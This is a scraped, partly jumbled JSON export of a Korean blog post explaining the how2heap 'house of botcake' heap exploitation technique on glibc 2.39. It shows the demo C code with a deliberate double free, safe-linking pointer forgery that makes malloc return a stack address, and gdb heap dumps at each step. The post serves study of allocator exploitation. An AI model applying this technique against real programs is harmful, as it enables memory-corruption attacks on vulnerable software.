unsorted bin\uc778 \uacbd\uc6b0, safe-linking \ubcf4\ud638\uae30\ubc95\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\ub294\ub2e4!<\/strong><\/p>\n\n\n\n
\ud574\ub2f9 \uae30\ubc95\uc740 tcache-poisoning \uae30\ubc95\uc744 \ud1b5\ud574 \uba54\ubaa8\ub9ac \ud560\ub2f9\ubc1b\ub54c <\/strong> \ubc29\ubc95\uc740 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n 1. \ucd94\ud6c4 free\ub97c \ud1b5\ud574 tcache \ub9ac\uc2a4\ud2b8\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 7\uac1c\uc758 \uccad\ud06c( 2.<\/strong> \ucd94\ud6c4 \ubcd1\ud569\uc744 \uc704\ud574 prev\ub77c\ub294 \uccad\ud06c \ud558\ub098\ub97c \ud560\ub2f9( 3.<\/strong> \uc774\uc81c \uccad\ud06c \uc624\ubc84\ub798\ud551(chunk overlapping)\uc744 \ubc1c\uc0dd\uc2dc\ud0ac \uc218 \uc788\ub2e4. 4. victim a \uccad\ud06c\ub97c \ud574\uc81c\ud558\uc5ec 5. prev \uccad\ud06c\ub97c \ud574\uc81c\ud558\uc5ec victim a \uccad\ud06c\uc640 \ubcd1\ud569(consolidate)\ub418\ub3c4\ub85d \ub9cc\ub4e0\ub2e4.<\/strong><\/p>\n\n\n\n 6. tcache \ub9ac\uc2a4\ud2b8\uc5d0\uc11c \ud558\ub098 \uaebc\ub0b4\uace0, ( \uc544\ub798\uc5d0\uc11c\ub294 tcache-poisoning \uacf5\uaca9\uae30\ubc95\uc744 \uc0ac\uc6a9\ud55c\ub2e4.<\/p>\n\n\n\n 8. tcache\uc5d0\uc11c a victim \uccad\ud06c\ub97c \ub2e4\uc2dc \uac00\uc838\uc628\ub2e4. ( 9. tcache\uc5d0\uc11c target \uccad\ud06c\ub97c \uac00\uc838\uc628\ub2e4. ( \uc774 \uacf5\uaca9\uc740 \ub2e4\uc74c \ucee4\ubc0b\uc5d0\uc11c \ub3c4\uc785\ub41c \uc81c\uc57d\uc744 \uc6b0\ud68c\ud574\uc57c \ud569\ub2c8\ub2e4: https:\/\/sourceware.org\/git\/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d<\/a><\/p>\n\n\n\n \ub9cc\uc57d \uc0ac\uc6a9\ud558\ub294 libc\uc5d0 \ud574\ub2f9 \uc81c\uc57d\uc774 \ud3ec\ud568\ub418\uc5b4 \uc788\uc9c0 \uc54a\ub2e4\uba74, victim\uc744 \uc774\uc911 \ud574\uc81c(double free)\ud55c \ud6c4 \ub2e8\uc21c\ud55c tcache \ud3ec\uc774\uc988\ub2dd(tcache poisoning)\uc744 \uc218\ud589\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4. \uadf8\ub9ac\uace0 \uc774 \uae30\ubc95\uc758 \uc774\uc0c1\ud55c \uc774\ub984\uc5d0 \ub300\ud574 @anton00b \ubc0f @subwire\uc5d0\uac8c \uac10\uc0ac\ub4dc\ub9bd\ub2c8\ub2e4.<\/p>\n\n\n\n \uba3c\uc800, \ubc84\ud37c\ub9c1\uc744 \ube44\ud65c\uc131\ud654\ud558\uc5ec \uc774 \ud30c\uc77c\uc740 \ud799 \ub808\uc774\uc544\uc6c3 \uc900\ube44\ud788\ub294\ub370 \uc55e\uc11c, \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \ub098\uc911\uc5d0 \ubcd1\ud569(consolidation)\uc744 \uc704\ud574 \uccad\ud06c \ud558\ub098\ub97c \ud560\ub2f9\ud568: \uc774\uc804(prev) \uc8fc\uc18c @ \ud53c\ud574\uc790(victim) \uccad\ud06c\ub97c \ud560\ub2f9\ud568: a @ \ubcd1\ud569\uc744 \ubc29\uc9c0\ud558\uae30 \uc704\ud574 \ud328\ub529 \uccad\ud06c\ub97c \ud560\ub2f9\ud568.<\/p>\n\n\n\n \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \uc774\uc81c \uccad\ud06c \uc624\ubc84\ub798\ud551(chunk overlapping)\uc744 \ubc1c\uc0dd\uc2dc\ud0ac \uc218 \uc788\uc74c. \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n 2\ub2e8\uacc4: victim a \uccad\ud06c\ub97c \ud574\uc81c\ud558\uc5ec \ub530\ub77c\uc11c victim a\ub97c free\uc2dc\ud0a8\ub2e4\uba74, \ucd08\uacfc\ud558\ubbc0\ub85c unsorted bin\uc5d0 \ud574\ub2f9\ub41c\ub2e4.<\/p>\n\n\n\n unsorted bin\uc778 \uacbd\uc6b0, safe-linking\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\ub294\ub2e4.<\/p>\n\n\n\n \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n 3\ub2e8\uacc4: prev \uccad\ud06c\ub97c \ud574\uc81c\ud558\uc5ec victim a \uccad\ud06c\uc640 \ubcd1\ud569(consolidate)\ub418\ub3c4\ub85d \ub9cc\ub4e4\uae30.<\/p>\n\n\n\n \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n 4\ub2e8\uacc4: tcache \ub9ac\uc2a4\ud2b8\uc5d0\uc11c \ud558\ub098\ub97c \uaebc\ub0b8 \ub4a4, a victim \uccad\ud06c\ub97c \ub2e4\uc2dc \ud574\uc81c\ud558\uc5ec tcache \ub9ac\uc2a4\ud2b8\uc5d0 \ucd94\uac00\ud55c\ub2e4.<\/p>\n\n\n\n \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \ucf54\ub4dc2:<\/p>\n\n\n\n \uacb0\uacfc2:<\/p>\n\n\n\n \uc774\uc81c \uc6b0\ub9ac\ub294 \uccad\ud06c \uc624\ubc84\ub798\ud551 \ud504\ub9ac\ubbf8\ud2f0\ube0c\ub97c \ud655\ubcf4\ud588\uc2b5\ub2c8\ub2e4:<\/p>\n\n\n\n \uc774 \ud504\ub9ac\ubbf8\ud2f0\ube0c\ub97c \ud1b5\ud574 \uac1d\uccb4, \ud799 \uba54\ud0c0\ub370\uc774\ud130 \ub4f1\uc744 \uc9c1\uc811 \uc77d\uace0 \uc4f8 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n \uc544\ub798\uc5d0\uc11c\ub294 \uccad\ud06c \uc624\ubc84\ub798\ud551 \ud504\ub9ac\ubbf8\ud2f0\ube0c\ub97c \uc0ac\uc6a9\ud558\uc5ec tcache \ud3ec\uc774\uc988\ub2dd \uacf5\uaca9\uc744 \uc218\ud589\ud569\ub2c8\ub2e4.<\/p>\n\n\n\n \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n tcache\uc5d0\uc11c a victim \uccad\ud06c\ub97c \ub2e4\uc2dc \uac00\uc838\uc635\ub2c8\ub2e4. \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n tcache\uc5d0\uc11c target \uccad\ud06c\ub97c \uac00\uc838\uc635\ub2c8\ub2e4. \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \ud658\uacbd Ubuntu GLIBC 2.39-0ubuntu8.4 \/ Ubuntu 24.04.1 LTS x86_64 \uc694\uc57d free\uc2dc\ucf30\uc744\ub54c tcache\uc778 \uacbd\uc6b0, safe-linking \ubcf4\ud638\uae30\ubc95\uc774 \uc801\uc6a9\ub418\uc9c0\ub9ccunsorted bin\uc778 \uacbd\uc6b0, safe-linking \ubcf4\ud638\uae30\ubc95\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\ub294\ub2e4! \ud574\ub2f9 \uae30\ubc95\uc740 tcache-poisoning \uae30\ubc95\uc744 \ud1b5\ud574 \uba54\ubaa8\ub9ac \ud560\ub2f9\ubc1b\ub54c \uc2a4\ud0dd \ubc94\uc704 \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\ub294 \uae30\ubc95 \uc911 \ud558\ub098\uc774\ub2e4. \ubc29\ubc95\uc740 \ub2e4\uc74c\uacfc \uac19\ub2e4. 1. \ucd94\ud6c4 free\ub97c \ud1b5\ud574 tcache \ub9ac\uc2a4\ud2b8\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 7\uac1c\uc758 \uccad\ud06c((malloc(0x100))\ub97c \ud560\ub2f9\ud55c\ub2e4. 2. \ucd94\ud6c4 \ubcd1\ud569\uc744 \uc704\ud574 prev\ub77c\ub294… \ub354 \ubcf4\uae30 »[how2heap\/glibc2.39] house_of_botcake<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[52],"tags":[58,35,57,25,59],"class_list":["post-3648","post","type-post","status-publish","format-standard","hentry","category-how2heap","tag-glibc_2-39","tag-heap","tag-house_of_bot_cake","tag-pwnable","tag-tcache-poisoning"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3648","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3648"}],"version-history":[{"count":8,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3648\/revisions"}],"predecessor-version":[{"id":3669,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3648\/revisions\/3669"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3648"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3648"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3648"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\uc2a4\ud0dd \ubc94\uc704 \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\ub294 \uae30\ubc95 \uc911 \ud558\ub098\uc774\ub2e4.<\/strong><\/p>\n\n\n\n(malloc(0x100)<\/code>)\ub97c \ud560\ub2f9\ud55c\ub2e4.<\/strong><\/p>\n\n\n\nmalloc(0x100)<\/code>),<\/strong>
a victim \uccad\ud06c \ud558\ub098 \ud560\ub2f9(malloc(0x100),<\/strong>
\uadf8\ub9ac\uace0 \ubcd1\ud569\ubc29\uc9c0\ub97c \uc704\ud574 \ud328\ub529 \uccad\ud06c \ud558\ub098 \ud560\ub2f9\ud55c\ub2e4.(malloc(0x10)<\/code>)<\/strong><\/p>\n\n\n\n
1\ubc88 \uacfc\uc815\uc5d0 \uc788\uc5c8\ub358 x[0]~x[6]\uae4c\uc9c0 \ubaa8\ub450 \ud560\ub2f9\ud574\uc81c\ud55c\ub2e4. \uc774\ub294 tcache\ub97c \uc804\ubd80 \ucc44\uc6b0\uae30 \uc704\ud568.<\/strong><\/p>\n\n\n\nunsorted bin<\/code>\uc5d0 \ucd94\uac00\ub418\ub3c4\ub85d \ub9cc\ub4e0\ub2e4.<\/strong><\/p>\n\n\n\nmalloc(0x100)<\/code>),<\/strong>
a victim \uccad\ud06c\ub97c \ub2e4\uc2dc \ud574\uc81c\ud558\uc5ec(free(a)<\/code>) tcache \ub9ac\uc2a4\ud2b8\uc5d0 \ucd94\uac00\ud55c\ub2e4.<\/strong><\/p>\n\n\n\n\n
\uc774 \ud504\ub9ac\ubbf8\ud2f0\ube0c\ub97c \ud1b5\ud574 \uac1d\uccb4, \ud799 \uba54\ud0c0\ub370\uc774\ud130 \ub4f1\uc744 \uc9c1\uc811 \uc77d\uace0 \uc4f8 \uc218 \uc788\ub2e4.<\/li>\n<\/ol>\n\n\n\n\n
intptr_t *unsorted = malloc(0x100 + 0x100 + 0x10);<\/code><\/strong>
\u2192 malloc(prev_sz + a victim sz + 0x10)<\/strong><\/li>\n\n\n\nvictim->next<\/code> \ud3ec\uc778\ud130\ub97c \uc81c\uc5b4\ud55c\ub2e4. <\/strong>unsorted[0x110\/sizeof(intptr_t)] = ((long)a >> 12) ^ (long)stack_var;<\/code> <\/strong>
-> free\ub41c victim a\uc758 fd\uac12\uc744 \uc6d0\ud558\ub294 \uc8fc\uc18c\uac12(eg.target; \uc2a4\ud0dd\ubc94\uc704 \uc8fc\uc18c)\uc73c\ub85c \uc870\uc791 (safe-linking \uc801\uc6a9 \ud544\uc694).<\/strong><\/li>\n<\/ol>\n\n\n\na = malloc(0x100)<\/code>)<\/strong>
\uc774\ub807\uac8c \ud558\uba74 target\uc774 tcache \ub9e8 \uc704\uc5d0 \uc704\uce58\ud558\uac8c \ub41c\ub2e4.<\/p>\n\n\n\nintptr_t *target = malloc(0x100);<\/code>) <\/strong>
\uac00\uc838\uc624\uba74, \uc2a4\ud0dd \ubc94\uc704\uc758 \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uac8c \ub41c\ub2e4!<\/strong><\/p>\n\n\n\n\ube4c\ub4dc \ud2b9\uc774\uc0ac\ud56d<\/h3>\n\n\n\n
-Os<\/code> \uc635\uc158\uc73c\ub85c \ucef4\ud30c\uc77c\ud558\uba74 \uc548\ub428.<\/p>\n\n\n\ngcc -O0 -o house_of_botcake house_of_botcake.c<\/code><\/p>\n\n\n\n\ub0b4\uc6a9<\/h3>\n\n\n\n
1.<\/h3>\n\n\n\n
_IO_FILE<\/code>\uc774 \ud799\uc5d0 \uac04\uc12d\ud558\uc9c0 \uc54a\ub3c4\ub85d \ud569\ub2c8\ub2e4.<\/p>\n\n\n\nmalloc<\/code>\uc744 \uc18d\uc5ec \uc784\uc758\uc758 \uc704\uce58(\uc774 \ub370\ubaa8\uc5d0\uc11c\ub294 \uc2a4\ud0dd)\uc5d0 \ub300\ud55c \ud3ec\uc778\ud130\ub97c \ubc18\ud658\ud558\ub3c4\ub85d \ub9cc\ub4dc\ub294 \uac15\ub825\ud55c tcache poisoning attack\uc744 \ubcf4\uc5ec\uc90d\ub2c8\ub2e4. \uc774 \uacf5\uaca9\uc740 \uc624\uc9c1 double free\uc5d0\ub9cc \uc758\uc874\ud569\ub2c8\ub2e4.<\/p>\n\n\n\nmalloc()<\/code>\uc774 \ubc18\ud658\ud558\ub3c4\ub85d \ub9cc\ub4e4\uace0\uc790 \ud558\ub294 \uc8fc\uc18c, \uc989 \ud0c0\uac9f \uc8fc\uc18c\ub294 \uc2a4\ud0dd \ubc94\uc704\uc778 0x7fffffffe020<\/code>\uc774\ub2e4<\/strong>.<\/p>\n\n\n\n
\ub098\uc911\uc5d0 tcache \ub9ac\uc2a4\ud2b8\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 7\uac1c\uc758 \uccad\ud06c((malloc(0x100)<\/code>)\ub97c \ud560\ub2f9\ud55c\ub2e4.<\/strong><\/p>\n\n\n\nint main()\n{\n \/*\n * This attack should bypass the restriction introduced in\n * https:\/\/sourceware.org\/git\/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d\n * If the libc does not include the restriction, you can simply double free the victim and do a\n * simple tcache poisoning\n * And thanks to @anton00b and @subwire for the weird name of this technique *\/\n\n \/\/ disable buffering so _IO_FILE does not interfere with our heap\n setbuf(stdin, NULL);\n setbuf(stdout, NULL);\n\n \/\/ introduction\n puts(\"This file demonstrates a powerful tcache poisoning attack by tricking malloc into\");\n puts(\"returning a pointer to an arbitrary location (in this demo, the stack).\");\n puts(\"This attack only relies on double free.\\n\");\n\n \/\/ prepare the target\n intptr_t stack_var[4];\n puts(\"The address we want malloc() to return, namely,\");\n printf(\"the target address is %p.\\n\\n\", stack_var);\n\n \/\/ prepare heap layout\n puts(\"Preparing heap layout\");\n puts(\"Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later.\");\n intptr_t *x[7];\n for(int i=0; i<sizeof(x)\/sizeof(intptr_t*); i++){\n x[i] = malloc(0x100);\n }<\/pre>\n\n\n\ngdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Used None None\n0x5555555593a0 0x0 0x110 Used None None\n0x5555555594b0 0x0 0x110 Used None None\n0x5555555595c0 0x0 0x110 Used None None\n0x5555555596d0 0x0 0x110 Used None None\n0x5555555597e0 0x0 0x110 Used None None\n0x5555555598f0 0x0 0x110 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559a00 (size : 0x20600)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-54-1024x596.png\")
<\/figure>\n\n\n\n2.<\/h3>\n\n\n\n
0x555555559a10<\/code><\/strong><\/p>\n\n\n\n0x555555559b20<\/code><\/strong><\/p>\n\n\n\n intptr_t *prev = malloc(0x100);\n printf(\"Allocating a chunk for later consolidation: prev @ %p\\n\", prev);\n intptr_t *a = malloc(0x100);\n printf(\"Allocating the victim chunk: a @ %p\\n\", a);\n puts(\"Allocating a padding to prevent consolidation.\\n\");\n malloc(0x10);<\/pre>\n\n\n\n
Allocating a chunk for later consolidation: prev @ 0x555555559a10\nAllocating the victim chunk: a @ 0x555555559b20\nAllocating a padding to prevent consolidation.<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Used None None\n0x5555555593a0 0x0 0x110 Used None None\n0x5555555594b0 0x0 0x110 Used None None\n0x5555555595c0 0x0 0x110 Used None None\n0x5555555596d0 0x0 0x110 Used None None\n0x5555555597e0 0x0 0x110 Used None None\n0x5555555598f0 0x0 0x110 Used None None\n0x555555559a00 0x0 0x110 Used None None\n0x555555559b10 0x0 0x110 Used None None\n0x555555559c20 0x0 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-55-1024x723.png\")
<\/figure>\n\n\n\n3.<\/h3>\n\n\n\n
x[0]~x[6]\uae4c\uc9c0 \ud560\ub2f9\ud574\uc81c\ud568. \uc774\ub294 tcache\ub97c \uc804\ubd80 \ucc44\uc6b0\uae30 \uc704\ud568.<\/p>\n\n\n\n\/\/ cause chunk overlapping\n puts(\"Now we are able to cause chunk overlapping\");\n puts(\"Step 1: fill up tcache list\");\n for(int i=0; i<7; i++){\n free(x[i]);\n }<\/pre>\n\n\n\ngdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Freed 0x555555559 None\n0x5555555593a0 0x0 0x110 Freed 0x55500000c7f9 None\n0x5555555594b0 0x0 0x110 Freed 0x55500000c6e9 None\n0x5555555595c0 0x0 0x110 Freed 0x55500000c199 None\n0x5555555596d0 0x0 0x110 Freed 0x55500000c089 None\n0x5555555597e0 0x0 0x110 Freed 0x55500000c3b9 None\n0x5555555598f0 0x0 0x110 Freed 0x55500000c2a9 None\n0x555555559a00 0x0 0x110 Used None None\n0x555555559b10 0x0 0x110 Used None None\n0x555555559c20 0x0 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x110) tcache_entry[15](7): 0x555555559900 --> 0x5555555597f0 --> 0x5555555596e0 --> 0x5555555595d0 --> 0x5555555594c0 --> 0x5555555593b0 --> 0x5555555592a0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-56-1024x762.png\")
<\/figure>\n\n\n\n4.<\/h3>\n\n\n\n
unsorted bin<\/code>\uc5d0 \ucd94\uac00\ub418\ub3c4\ub85d \ub9cc\ub4e0\ub2e4.<\/p>\n\n\n\nmalloc<\/code>\uc73c\ub85c 144\ubc14\uc774\ud2b8 \uc774\ud558(\ub0b4\ubd80 \uccad\ud06c \ud06c\uae30\ub294 160\ubc14\uc774\ud2b8 \uc774\ud558)\ub97c \uc694\uccad\ud558\uba74 \ud574\ub2f9 \uccad\ud06c\ub294 fastbin\uc5d0 \ud574\ub2f9\ub418\uace0,
fastbin\uc758 \ucd5c\ub300 \ub0b4\ubd80 \uccad\ud06c\ud06c\uae30\uc778 160\ubc14\uc774\ud2b8\ub97c \ucd08\uacfc\ud558\uba74 unsorted bin\uc5d0 \ud574\ub2f9\ub41c\ub2e4.<\/p>\n\n\n\n puts(\"Step 2: free the victim chunk so it will be added to unsorted bin\");\n free(a);<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Freed 0x555555559 None\n0x5555555593a0 0x0 0x110 Freed 0x55500000c7f9 None\n0x5555555594b0 0x0 0x110 Freed 0x55500000c6e9 None\n0x5555555595c0 0x0 0x110 Freed 0x55500000c199 None\n0x5555555596d0 0x0 0x110 Freed 0x55500000c089 None\n0x5555555597e0 0x0 0x110 Freed 0x55500000c3b9 None\n0x5555555598f0 0x0 0x110 Freed 0x55500000c2a9 None\n0x555555559a00 0x0 0x110 Used None None\n0x555555559b10 0x0 0x110 Freed 0x7ffff7e03b20 0x7ffff7e03b20\n0x555555559c20 0x110 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x555555559b10 (size : 0x110)\n(0x110) tcache_entry[15](7): 0x555555559900 --> 0x5555555597f0 --> 0x5555555596e0 --> 0x5555555595d0 --> 0x5555555594c0 --> 0x5555555593b0 --> 0x5555555592a0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-57-1024x785.png\")
<\/figure>\n\n\n\n5.<\/h3>\n\n\n\n
puts(\"Step 3: free the previous chunk and make it consolidate with the victim chunk.\");\n free(prev);<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Freed 0x555555559 None\n0x5555555593a0 0x0 0x110 Freed 0x55500000c7f9 None\n0x5555555594b0 0x0 0x110 Freed 0x55500000c6e9 None\n0x5555555595c0 0x0 0x110 Freed 0x55500000c199 None\n0x5555555596d0 0x0 0x110 Freed 0x55500000c089 None\n0x5555555597e0 0x0 0x110 Freed 0x55500000c3b9 None\n0x5555555598f0 0x0 0x110 Freed 0x55500000c2a9 None\n0x555555559a00 0x0 0x220 Freed 0x7ffff7e03b20 0x7ffff7e03b20\n0x555555559c20 0x220 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x555555559a00 (size : 0x220)\n(0x110) tcache_entry[15](7): 0x555555559900 --> 0x5555555597f0 --> 0x5555555596e0 --> 0x5555555595d0 --> 0x5555555594c0 --> 0x5555555593b0 --> 0x5555555592a0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-58-1024x745.png\")
<\/figure>\n\n\n\n6.<\/h3>\n\n\n\n
malloc(0x100);<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Freed 0x555555559 None\n0x5555555593a0 0x0 0x110 Freed 0x55500000c7f9 None\n0x5555555594b0 0x0 0x110 Freed 0x55500000c6e9 None\n0x5555555595c0 0x0 0x110 Freed 0x55500000c199 None\n0x5555555596d0 0x0 0x110 Freed 0x55500000c089 None\n0x5555555597e0 0x0 0x110 Freed 0x55500000c3b9 None\n0x5555555598f0 0x0 0x110 Freed 0x55500000c2a9 None\n0x555555559a00 0x0 0x220 Freed 0x7ffff7e03b20 0x7ffff7e03b20\n0x555555559c20 0x220 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x555555559a00 (size : 0x220)\n(0x110) tcache_entry[15](6): 0x5555555597f0 --> 0x5555555596e0 --> 0x5555555595d0 --> 0x5555555594c0 --> 0x5555555593b0 --> 0x5555555592a0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-59-1024x708.png\")
<\/figure>\n\n\n\n \/*VULNERABILITY*\/\n free(a);\/\/ a is already freed\n \/*VULNERABILITY*\/<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Freed 0x555555559 None\n0x5555555593a0 0x0 0x110 Freed 0x55500000c7f9 None\n0x5555555594b0 0x0 0x110 Freed 0x55500000c6e9 None\n0x5555555595c0 0x0 0x110 Freed 0x55500000c199 None\n0x5555555596d0 0x0 0x110 Freed 0x55500000c089 None\n0x5555555597e0 0x0 0x110 Freed 0x55500000c3b9 None\n0x5555555598f0 0x0 0x110 Freed 0x55500000c2a9 None\n0x555555559a00 0x0 0x220 Freed 0x7ffff7e03b20 0x7ffff7e03b20\n0x555555559c20 0x220 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x555555559a00 (overlap chunk with 0x555555559b10(freed) )\n(0x110) tcache_entry[15](7): 0x555555559b20 --> 0x5555555597f0 --> 0x5555555596e0 --> 0x5555555595d0 --> 0x5555555594c0 --> 0x5555555593b0 --> 0x5555555592a0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-60-1024x663.png\")
<\/figure>\n\n\n\n7.<\/h3>\n\n\n\n
\n
